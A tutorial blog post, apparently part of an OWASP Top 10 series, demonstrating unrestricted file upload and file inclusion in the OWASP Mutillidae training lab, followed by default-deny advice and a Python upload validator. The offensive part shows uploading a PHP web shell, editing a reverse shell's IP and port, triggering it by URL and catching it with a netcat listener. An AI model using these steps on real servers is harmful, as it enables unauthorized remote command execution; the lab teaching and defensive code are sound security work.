A5: 2017 – Broken Access Control (Part 2)

With local file inclusion we use files that are already on the web server. But what if we could execute a file that is not supposed to be there at all? Let’s take a look.

In OWASP Mutillidae there is a section «Others» > «Unrestricted File upload» > «File upload». Let’s upload something with this form. I’ve uploaded a png file with no problems, because the server doesn’t validate what we are uploading.

Neat, now let’s upload something useful. There’s a whole class of scripts called «shell script». The main idea is to break the logic of a web application so that you control it yourself. Just google this term and you’ll see that there are dozens of shell scripts out there, plus you can craft your own. I’ll use this one. Simple, yet reliable. Let’s upload this file and call it with this request:

http://192.168.130.131/mutillidae/index.php?page=/tmp/webshell.php

It works. It adds a simple web interface to run any command on the remote server, browse directories, list files and so on.


Ok, let’s look at something a little more advanced. Let’s make the web application connect to our rogue server so we can issue commands at any time. Sort of a callback.

First we need a script. This class is called a reverse shell, because it gives us a shell … well, in reverse. Let’s get one from here. We need to change it a little and then upload it, just like the one before. We have to change two variables:

$ip = '127.0.0.1';
$port = 1234;

$ip is the IP address of our rogue server and $port is its port. Now let’s set it up. In fact, we don’t need a whole server, we just need a listener to accept connections. The easiest way to do that is with the netcat utility.

Netcat (or simply nc) is a legendary unix utility that was designed for network debugging and investigation, since it can produce almost any kind of network connection. And since there’s no real difference between debugging and pentest, we are going to use it here. I don’t use separate Linux machines if I can avoid it, so I run Linux utilities in the Windows Subsystem for Linux (heh, I’m a Windows guy with a heavy background in Windows servers, Exchange, TMG and stuff like that). To set up a listener we use this command:

nc -nlvp 1234

The parameters here are: n – numeric-only IP addresses, no DNS; l – listen mode, for inbound connects; v – verbose; and p – port 1234. Just what we need.

Now let’s upload our script and call it with

http://192.168.130.131/mutillidae/index.php?page=/tmp/php-shell-local.php

Let’s switch back to our netcat window. Voilà:


The script successfully connected to our netcat listener and now we can run commands just as if we were sitting at the server console.

Netcat is a versatile and formidable tool, use it with caution. Also check the SANS nc cheat sheet, by the way.

This is it for file inclusions, I hope you get the idea. You can go further and include files without uploading them at all, by calling them from remote servers. Be creative on this.

The red team is on fire, so what can the blue team do about it? Of course, use SAST or DAST, but don’t count on them too much: access control is mostly a subject for manual testing. Another important thing is a proper access matrix. Basically, you deny everything by default and then grant access only to specific users or processes. This is also known as the principle of least privilege. It’s like a firewall with a default rule of “any to any deny” and specific rules for specific ports and protocols.
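The same default-deny idea applied to the upload form from earlier in the post, as an added example (my own Python, not Mutillidae’s or any project’s code): an upload is rejected unless its single extension is on an allowlist, its magic bytes match that type, and no script tags are hidden inside, and the server picks the stored name itself. The allowlist, size limit and sample files are assumptions made up for the example.

```python
import os
import re
import secrets

# Magic bytes of the only types this form is meant to accept (default deny).
# Assumed allowlist for the example; extend only with types you really need.
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Executable content that should never appear inside an "image".
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script\b|<%", re.IGNORECASE)
MAX_BYTES = 2 * 1024 * 1024  # assumed limit


def check_upload(filename: str, data: bytes):
    """Return (ok, reason). Everything is rejected unless every check passes."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required (rejects shell.php.png)"
    ext = parts[1]
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension .{ext} not in allowlist"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        return False, "magic bytes do not match declared type"
    if SCRIPT_MARKERS.search(data):
        return False, "script markers found inside file"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random server-chosen name: the client never controls the stored path."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads: a real PNG header, a bare PHP file,
    # a PHP file with a double extension, and a PNG with PHP appended.
    samples = [
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("webshell.php", b"<?php echo 'hi'; ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("polyglot.png", b"\x89PNG\r\n\x1a\n" + b"junk<?php echo 1;"),
    ]
    for name, blob in samples:
        ok, why = check_upload(name, blob)
        print(f"{name}: {'accepted as ' + storage_name(name) if ok else why}")
```

Store accepted files outside the web root in a directory without execute permission; then even a file that slips past these checks is served as data, not run by PHP.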

At some point all these OWASP Top 10 vulnerabilities begin to overlap. It’s sometimes hard to distinguish injections from inclusions and data exposure from misconfiguration. But it’s not a big deal, since you know how to discover and handle each of them.
